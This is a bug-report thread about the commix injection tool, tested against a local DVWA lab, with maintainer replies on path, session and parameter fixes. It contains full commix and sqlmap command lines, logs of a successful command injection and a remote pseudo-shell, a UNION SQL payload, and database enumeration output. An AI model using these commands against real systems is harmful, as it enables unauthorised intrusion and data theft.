BUG: BULKFILE requires absolute path and parameter injection improvement if not specified

[U53RW4R3]

What are the running context details?

• Installation method

$ sudo apt install -y commix

• Client OS is Kali Linux

• Target OS is Ubuntu 22.04

• Program version

$ commix --version    
v3.9-stable

Parameter Injection

In the DNS hosts file for easy navigation in the URL.

$ sudo nano /etc/hosts
<DVWA_IP>	dvwa.local

Pretty sure you're still aware of the pseudo terminal when I list the files (ls -l) it gives me

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[21:52:20] [info] Testing connection to the target URL. 
[21:52:20] [info] The fetched random HTTP User-Agent header value is 'Opera/8.51 (Macintosh; PPC Mac OS X; U; de)'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[21:52:50] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[21:52:50] [info] Performing identification checks to the target URL.
[21:52:53] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[21:52:53] [info] Setting POST parameter 'ip' for tests.
[21:52:53] [warning] Heuristic (basic) tests shows that POST parameter 'ip' might not be injectable.
[21:53:04] [info] Testing the (results-based) classic command injection technique.           
[21:53:04] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > ls -l
total 12 drwxr-xr-x 2 root root 4096 Feb 27 10:53 help -rw-r--r-- 1 root root 1829 Feb 27 10:53 index.php drwxr-xr-x 2 root root 4096 Feb 27 10:53 source

The rest of the commands are fine.

commix(os_shell) > pwd
/var/www/html/dvwa/vulnerabilities/exec
commix(os_shell) > uname -a
Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

When I issue help (?) command it terminates the console.

commix(os_shell) > ?
Available 'os_shell' options:
 * Type '?' to get all the available options.
 * Type 'back' to move back from the current context.
 * Type 'quit' / 'exit' (or use <Ctrl-C>) to quit commix.
 * Type 'reverse_tcp' to get a reverse TCP connection.
 * Type 'bind_tcp' to set a bind TCP connection.
[21:53:51] [info] Fetched data logged to text files under '/usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt'.

Two additional front slashes and wrong path: /usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt. However, the log file is there along with session and history.

$ ls -l ~/.commix/output/dvwa.local/
total 20
-rw------- 1 user user    21 Apr 17 21:53 cli_history
-rw-r--r-- 1 user user  1630 Apr 17 21:54 logs.txt
-rw-r--r-- 1 user user 12288 Apr 17 21:53 session.db

The work around is to execute a single command --os-cmd and there's no issue so far.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a"
[21:54:52] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > 
[21:54:54] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
[21:54:54] [info] Executing the user-supplied command: 'uname -a'.
[21:54:54] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)

I discovered when I use --batch and to skip using the console (--answers="pseudo-terminal=N") it started to inject commands in the Submit POST parameter which I'm suppose to pass the argument (-p Submit) but that wasn't my intention I think it's the session file (~/.commix/output/dvwa.local/session.db).

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a" --batch --answers="pseudo-terminal=N"
[22:03:28] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > Y
[22:03:28] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
[22:03:28] [info] Executing the user-supplied command: 'uname -a'.
[22:03:28] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Now here's the interesting part it doesn't recieve any output when I wanted to execute a single command with --os-cmd="uname -a"? It already worked once so I have no idea what's going on. Probably there is something wrong with the cookies I think. I don't believe this is a bug so you can ignore this part.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a"                                      
[23:25:51] [info] Testing connection to the target URL. 
[23:25:51] [info] The fetched random HTTP User-Agent header value is 'mozilla/3.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/5.0.1'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[23:26:06] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[23:26:06] [info] Performing identification checks to the target URL.

No output.

[23:26:09] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:26:09] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > 
[23:26:15] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo TZQGIU$((70+4))$(echo TZQGIU)TZQGIU
[23:26:15] [info] Executing the user-supplied command: 'uname -a'.
[23:26:15] [error] The execution of 'uname -a' command, does not return any output.
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > uname -a
[23:29:27] [error] The execution of 'uname -a' command, does not return any output.
commix(os_shell) >

The fix is to purge the previous session and re-run the exploit.

$ commix --purge

[23:30:51] [info] Purging content of directory '/home/user/.commix/output/'.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c --os-cmd="uname -a"
[23:32:07] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo PSIXTB$((1+57))$(echo PSIXTB)PSIXTB
[23:32:07] [info] Executing the user-supplied command: 'uname -a'.
[23:32:16] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > n
Do you want to continue with testing the classic command injection technique? [y/N] > 
Skipping of further command injection tests is recommended. Do you agree? [Y/n] > 
[23:32:27] [info] Fetched data logged to text files under '/usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt'.

I've used the --batch and to skip the console (--answers="pseudo-terminal=N") but it does the same thing to inject the Submit parameter and I didn't specify the parameter with -p Submit. It's suppose to terminate the program when the adversay is on the post exploitation phase.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a" --batch --answers="pseudo-terminal=N"
[23:35:11] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo PSIXTB$((1+57))$(echo PSIXTB)PSIXTB
[23:35:11] [info] Executing the user-supplied command: 'uname -a'.
[23:35:11] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > N
Do you want to continue with testing the classic command injection technique? [y/N] > N
Skipping of further command injection tests is recommended. Do you agree? [Y/n] > Y
[23:35:14] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:35:14] [info] Setting POST parameter 'Submit' for tests.

You can reproduce this with sqlmap to see that it's not required to pass the parameters after it was exploited. Which is why commix requires a bit of improvement.

$ sqlmap -u "http://dvwa.local/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" --random-agent -p id --dbms=mysql --technique=U --union-cols=2
[23:40:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 2 to 2 columns (custom)' injectable
[23:40:30] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns (custom)
    Payload: id=1' UNION ALL SELECT CONCAT(0x71707a7071,0x6a4877516b566d54574c4477676e4350444b4b4c6b767555446d674e59706f4a496b517849695467,0x7170627171),NULL-- -&Submit=Submit
---

$ sqlmap -u "http://dvwa.local/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" --random-agent --dbs
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

BULKFILE when scanning URLs

Last but not least the BULKFILE flag (-m) requires an absolute path in order to scan the URLs.

$ commix -m /home/user/urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 
[23:46:57] [info] Testing connection to the target URL.

$ commix -m $(pwd)/urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:23] [info] Parsing targets using the 'urls.txt' file.  
[23:44:23] [info] Found a total of 1 target.
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 
[23:44:27] [info] Testing connection to the target URL. 
[23:44:27] [info] The fetched random HTTP User-Agent header value is 'Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.31; .NET CLR 3.0.04506.648)'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[23:45:31] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[23:45:31] [info] Performing identification checks to the target URL.
[23:45:34] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:45:34] [info] Setting POST parameter 'ip' for tests.
[23:45:34] [warning] Heuristic (basic) tests shows that POST parameter 'ip' might not be injectable.
[23:45:44] [info] Testing the (results-based) classic command injection technique.           
[23:45:44] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo KLEXAC$((25+77))$(echo KLEXAC)KLEXAC

If not it won't recognize the file existence. --output-dir flag is also affected by this bug as well which corresponds with /usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt the output path.

$ cat urls.txt
http://dvwa.local/dvwa/vulnerabilities/exec/#

$ commix -m urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:01] [info] Parsing targets using the 'urls.txt' file.  
[23:44:01] [critical] It seems that the 'urls.txt' file, does not exist.

$ commix -m ./urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:08] [info] Parsing targets using the 'urls.txt' file.  
[23:44:08] [critical] It seems that the 'urls.txt' file, does not exist.

[stasinopoulos]

Thank you for your time and the detailed report.
Several of the issues you mention, will be fixed in version v4.0-stable.

[U53RW4R3]

Also the -r request.txt requires absolute path which is the same problem with --output-dir. Commix is thinking the files are included and stores in /usr/share/commix.

[stasinopoulos]

Τake a look at the dev version using git clone (that is under development / code refactoring). Some of the issues you mention (i.e. about slashes etc) have been resolved.

[U53RW4R3]

The path specification works and the issue has been resolved.

$ ./commix.py -m urls.txt --cookie="security=low; PHPSESSID=4enqpmsuibona05k9pqrrg5nqk" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=C
[06:54:18] [info] Parsing targets using the 'urls.txt' file.  
[06:54:18] [info] Found a total of 1 target.
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 

However the double slashes hasn't been resolved. But specifying the path wasn't an issue any longer.

$ ./commix.py -m urls.txt --cookie="security=low; PHPSESSID=4enqpmsuibona05k9pqrrg5nqk" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=C --output-dir=../vulns
[06:57:18] [info] Fetched data logged to text files under '/home/user/commix//home/user/vulns/dvwa.local/logs.txt'.

$ ls ~/vulns/dvwa.local 
cli_history  logs.txt  session.db

[stasinopoulos]

Fyi the issue regarding help (?) command (that terminates the console) is on my to-do list (I'll let ya know).

[stasinopoulos]

The "double slashes" issue has been resolved.